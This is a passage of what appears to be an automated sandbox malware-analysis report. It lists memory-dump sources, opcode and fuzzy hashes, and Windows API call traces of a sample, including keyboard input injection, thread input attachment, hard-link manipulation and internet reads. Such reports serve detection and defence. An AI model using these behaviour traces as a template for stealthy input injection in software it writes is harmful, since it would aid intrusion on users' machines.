• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: Window$ClientMoveRectScreen
• String ID:
• API String ID: 3880355969-0
• Opcode ID: df53a50cbfa047180e7263a27d76769326baa4811f47f584267f345f594f0fb2
• Instruction ID: 67ca03f0f9d4d1f03b1cc98794b0521baf927c90d948dd1e902106a1a5870158
• Opcode Fuzzy Hash: df53a50cbfa047180e7263a27d76769326baa4811f47f584267f345f594f0fb2
• Instruction Fuzzy Hash: 32515075A01619EFCF24DF68E880AAE7BB6FF94320F108169F9159B290D770ED91CB50
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c5a63c75a5f5d0b88a9c5e4c4b6081e173183052f1161cd789ae6542ab4bd713
• Instruction ID: b0c0d86f0b8fcf961e8ca8ef95fdb3000a7cda67561ec21da1b08f1ab392a7bb
• Opcode Fuzzy Hash: c5a63c75a5f5d0b88a9c5e4c4b6081e173183052f1161cd789ae6542ab4bd713
• Instruction Fuzzy Hash: 9541D372E40704AFD725AF78CC42FAABBADEF88710F10852EF511DB291D772A9018781
APIs
• CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00A061C8
• GetLastError.KERNEL32(?,00000000), ref: 00A061EE
• DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00A06213
• CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00A0623F
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: CreateHardLink$DeleteErrorFileLast
• String ID:
• API String ID: 3321077145-0
• Opcode ID: c6f9811f6f20007670d4f2561a6a290835671ec6f32b92d0da6786c102f679b6
• Instruction ID: 5da0d04448dce716f4af2c0c7c019af3e97c4f5e54b366b1e653207390f0ce5f
• Opcode Fuzzy Hash: c6f9811f6f20007670d4f2561a6a290835671ec6f32b92d0da6786c102f679b6
• Instruction Fuzzy Hash: A7414F35A00610DFCF11EF58C555B5EB7E2EF89714B198488E84A9B3A2CB31FD01CB91
APIs
• GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 009FB473
• SetKeyboardState.USER32(00000080), ref: 009FB48F
• PostMessageW.USER32(?,00000102,00000001,00000001), ref: 009FB4FD
                                                                                                                                                                                                                                  • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 009FB54F
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 432972143-0
                                                                                                                                                                                                                                  • Opcode ID: 521c388f834584940167dfb0723be16df2d00e7cbda813de1a72e5ec1cde8469
                                                                                                                                                                                                                                  • Instruction ID: 8195b2c19b8e0e1e0f16cd4fcfe1ba940a6fd536af01032832bc285b95430d98
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 521c388f834584940167dfb0723be16df2d00e7cbda813de1a72e5ec1cde8469
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E7312870A4025C6EFF30CF69CC057FE7BB9AB59310F14461AF696961E2C37889468761
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 009FB5B8
                                                                                                                                                                                                                                  • SetKeyboardState.USER32(00000080,?,00008000), ref: 009FB5D4
                                                                                                                                                                                                                                  • PostMessageW.USER32(00000000,00000101,00000000), ref: 009FB63B
                                                                                                                                                                                                                                  • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 009FB68D
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 432972143-0
                                                                                                                                                                                                                                  • Opcode ID: 76067fca07a15aebcd4a33bb4c2d93547fde683c9479977795396928234b48a7
                                                                                                                                                                                                                                  • Instruction ID: 9a23739e7ba04e3ecc8babbcb486c6dd60766d11472fe4f5c28d21dad35120a9
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 76067fca07a15aebcd4a33bb4c2d93547fde683c9479977795396928234b48a7
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C3310C70A4064CAEFF30CF65C8057FE7BAAAF85330F14462AE685D61D1C7788A568B51
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • ClientToScreen.USER32(?,?), ref: 00A280D4
                                                                                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00A2814A
                                                                                                                                                                                                                                  • PtInRect.USER32(?,?,?), ref: 00A2815A
                                                                                                                                                                                                                                  • MessageBeep.USER32(00000000), ref: 00A281C6
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1352109105-0
                                                                                                                                                                                                                                  • Opcode ID: 213e8bd34c202b912d079c64622e724eb300f2e087f449ab6b3b2d5c1d8592c6
                                                                                                                                                                                                                                  • Instruction ID: 39c2625566880dc609e47517b916aa35dacc3284c21baa3ae15e07a97d31aba8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 213e8bd34c202b912d079c64622e724eb300f2e087f449ab6b3b2d5c1d8592c6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F4418F31602225DFCB11CF9CE984AA9B7F5BB45310F1442B8F9549B2A1CB78E853CF90
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetForegroundWindow.USER32 ref: 00A22187
                                                                                                                                                                                                                                    • Part of subcall function 009F4393: GetWindowThreadProcessId.USER32(?,00000000), ref: 009F43AD
                                                                                                                                                                                                                                    • Part of subcall function 009F4393: GetCurrentThreadId.KERNEL32 ref: 009F43B4
                                                                                                                                                                                                                                    • Part of subcall function 009F4393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,009F2F00), ref: 009F43BB
                                                                                                                                                                                                                                  • GetCaretPos.USER32(?), ref: 00A2219B
                                                                                                                                                                                                                                  • ClientToScreen.USER32(00000000,?), ref: 00A221E8
                                                                                                                                                                                                                                  • GetForegroundWindow.USER32 ref: 00A221EE
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2759813231-0
                                                                                                                                                                                                                                  • Opcode ID: 2156fe9539d751d83f732342446fabb77605de44c81ae57faff3167cafc8d431
                                                                                                                                                                                                                                  • Instruction ID: f7fcd5cd5c61ddfe6cec48d1585f6e3077799a699774a4b81cb10c9804e6bf4c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2156fe9539d751d83f732342446fabb77605de44c81ae57faff3167cafc8d431
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 793141B1D01109AFCB04DFA9C881DAEB7F9EF88304B50446AE515E7211DA719E45CBA0
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 009941EA: _wcslen.LIBCMT ref: 009941EF
                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 009FE8E2
                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 009FE8F9
                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 009FE924
                                                                                                                                                                                                                                  • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 009FE92F
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: _wcslen$ExtentPoint32Text
• String ID:
• API String ID: 3763101759-0
APIs
  • Part of subcall function 0099249F: GetWindowLongW.USER32(00000000,000000EB), ref: 009924B0
• GetCursorPos.USER32(?), ref: 00A29A5D
• TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00A29A72
• GetCursorPos.USER32(?), ref: 00A29ABA
• DefDlgProcW.USER32(?,0000007B,?,?,?,?), ref: 00A29AF0
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: Cursor$LongMenuPopupProcTrackWindow
• String ID:
• API String ID: 2864067406-0
APIs
• GetFileAttributesW.KERNEL32(?,00A2DC30), ref: 009FDBA6
• GetLastError.KERNEL32 ref: 009FDBB5
• CreateDirectoryW.KERNEL32(?,00000000), ref: 009FDBC4
• CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00A2DC30), ref: 009FDC21
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: CreateDirectory$AttributesErrorFileLast
• String ID:
• API String ID: 2267087916-0
APIs
• GetWindowLongW.USER32(?,000000EC), ref: 00A232A6
• SetWindowLongW.USER32(?,000000EC,00000000), ref: 00A232C0
• SetWindowLongW.USER32(?,000000EC,00000000), ref: 00A232CE
• SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00A232DC
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: Window$Long$AttributesLayered
• String ID:
• API String ID: 2169480361-0
APIs
• InternetReadFile.WININET(?,?,00000400,?), ref: 00A0D8CE
• GetLastError.KERNEL32(?,00000000), ref: 00A0D92F
• SetEvent.KERNEL32(?,?,00000000), ref: 00A0D943
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: ErrorEventFileInternetLastRead
• String ID:
• API String ID: 234945975-0
APIs
  • Part of subcall function 009F96E4: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,009F8271,?,000000FF,?,009F90BB,00000000,?,0000001C,?,?), ref: 009F96F3
  • Part of subcall function 009F96E4: lstrcpyW.KERNEL32(00000000,?), ref: 009F9719
  • Part of subcall function 009F96E4: lstrcmpiW.KERNEL32(00000000,?,009F8271,?,000000FF,?,009F90BB,00000000,?,0000001C,?,?), ref: 009F974A
• lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,009F90BB,00000000,?,0000001C,?,?,00000000), ref: 009F828A
• lstrcpyW.KERNEL32(00000000,?), ref: 009F82B0
• lstrcmpiW.KERNEL32(00000002,cdecl,?,009F90BB,00000000,?,0000001C,?,?,00000000), ref: 009F82EB
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: lstrcmpilstrcpylstrlen
• String ID: cdecl
• API String ID: 4031866154-3896280584
                                                                                                                                                                                                                                  • Opcode ID: 06c1d6c68ae5832e3f14f7d0a4e50b976d67e401c97b9d211a2ffe17edad05a4
                                                                                                                                                                                                                                  • Instruction ID: cb4e9e80093ccfdf798dae250a4f9239200bf3588a6558b38e006d453556b033
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 06c1d6c68ae5832e3f14f7d0a4e50b976d67e401c97b9d211a2ffe17edad05a4
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 15110B3A200346ABCB149F78D845EBF77E9FF85750B50412AFA46C7260EF719812C750
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001060,?,00000004), ref: 00A2615A
                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00A2616C
                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00A26177
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 00A262B5
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: MessageSend_wcslen
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 455545452-0
                                                                                                                                                                                                                                  • Opcode ID: 0ac552a6bd0feea1c13323079b62248b4cf4c806a4340f8d05cfb1666bc3bafe
                                                                                                                                                                                                                                  • Instruction ID: 4c0364b34fda39cdd0fe939b57ee6c33c32f3c7f1f946346e00666b38ff38f3e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0ac552a6bd0feea1c13323079b62248b4cf4c806a4340f8d05cfb1666bc3bafe
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6711D335901228A6DB20DFA8ED84AEF7BBCFF51760B10413AFA11D6082E774D941DB60
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 3cc61f4abffe9a76390e7c3c93dd2f489ce8033bf33694d7f74a7d06e007d1d9
                                                                                                                                                                                                                                  • Instruction ID: d822bf2322a0af6f2e25d1cb0a8a887368c2b1a7af786892057461212a3e8cd5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3cc61f4abffe9a76390e7c3c93dd2f489ce8033bf33694d7f74a7d06e007d1d9
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E501A2B2A092167EF621A7BC6CC0F27671DDF913B8B34072EF521A51D2DA608C81D162
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 009F2394
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 009F23A6
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 009F23BC
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 009F23D7
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: MessageSend
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3850602802-0
                                                                                                                                                                                                                                  • Opcode ID: 5f76d6498804f2d9a178b66c6859488ae866cf233e8af3db667b99bfbb68e9fe
                                                                                                                                                                                                                                  • Instruction ID: ae14019570e6fc37f9fa451d3f3e3cd4326313e6a9efd4e30a9925a69551c54a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5f76d6498804f2d9a178b66c6859488ae866cf233e8af3db667b99bfbb68e9fe
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B9110C76900218FFDB11DB95CD85FADBB78FB08750F200091EA01B7290D6756E15DB94
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0099249F: GetWindowLongW.USER32(00000000,000000EB), ref: 009924B0
                                                                                                                                                                                                                                  • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00991AF4
                                                                                                                                                                                                                                  • GetClientRect.USER32(?,?), ref: 009D31F9
                                                                                                                                                                                                                                  • GetCursorPos.USER32(?), ref: 009D3203
                                                                                                                                                                                                                                  • ScreenToClient.USER32(?,?), ref: 009D320E
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Client$CursorLongProcRectScreenWindow
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4127811313-0
                                                                                                                                                                                                                                  • Opcode ID: 03a0cbaba9ce09bbcee82f89eee55ed9eab4aa0d6b29946adca97420004b0a66
                                                                                                                                                                                                                                  • Instruction ID: fe870dcb8e456099c2f86167e9792f7b99327997554ff7c379f93a07b4d57c04
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 03a0cbaba9ce09bbcee82f89eee55ed9eab4aa0d6b29946adca97420004b0a66
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0E113A32A0201AABDF10DFA8C9459FE77B9FB45341F104462F902E3241C774BA92CBA5
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 009FEB14
                                                                                                                                                                                                                                  • MessageBoxW.USER32(?,?,?,?), ref: 009FEB47
                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 009FEB5D
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 009FEB64
                                                                                                                                                                                                                                  Memory Dump Source
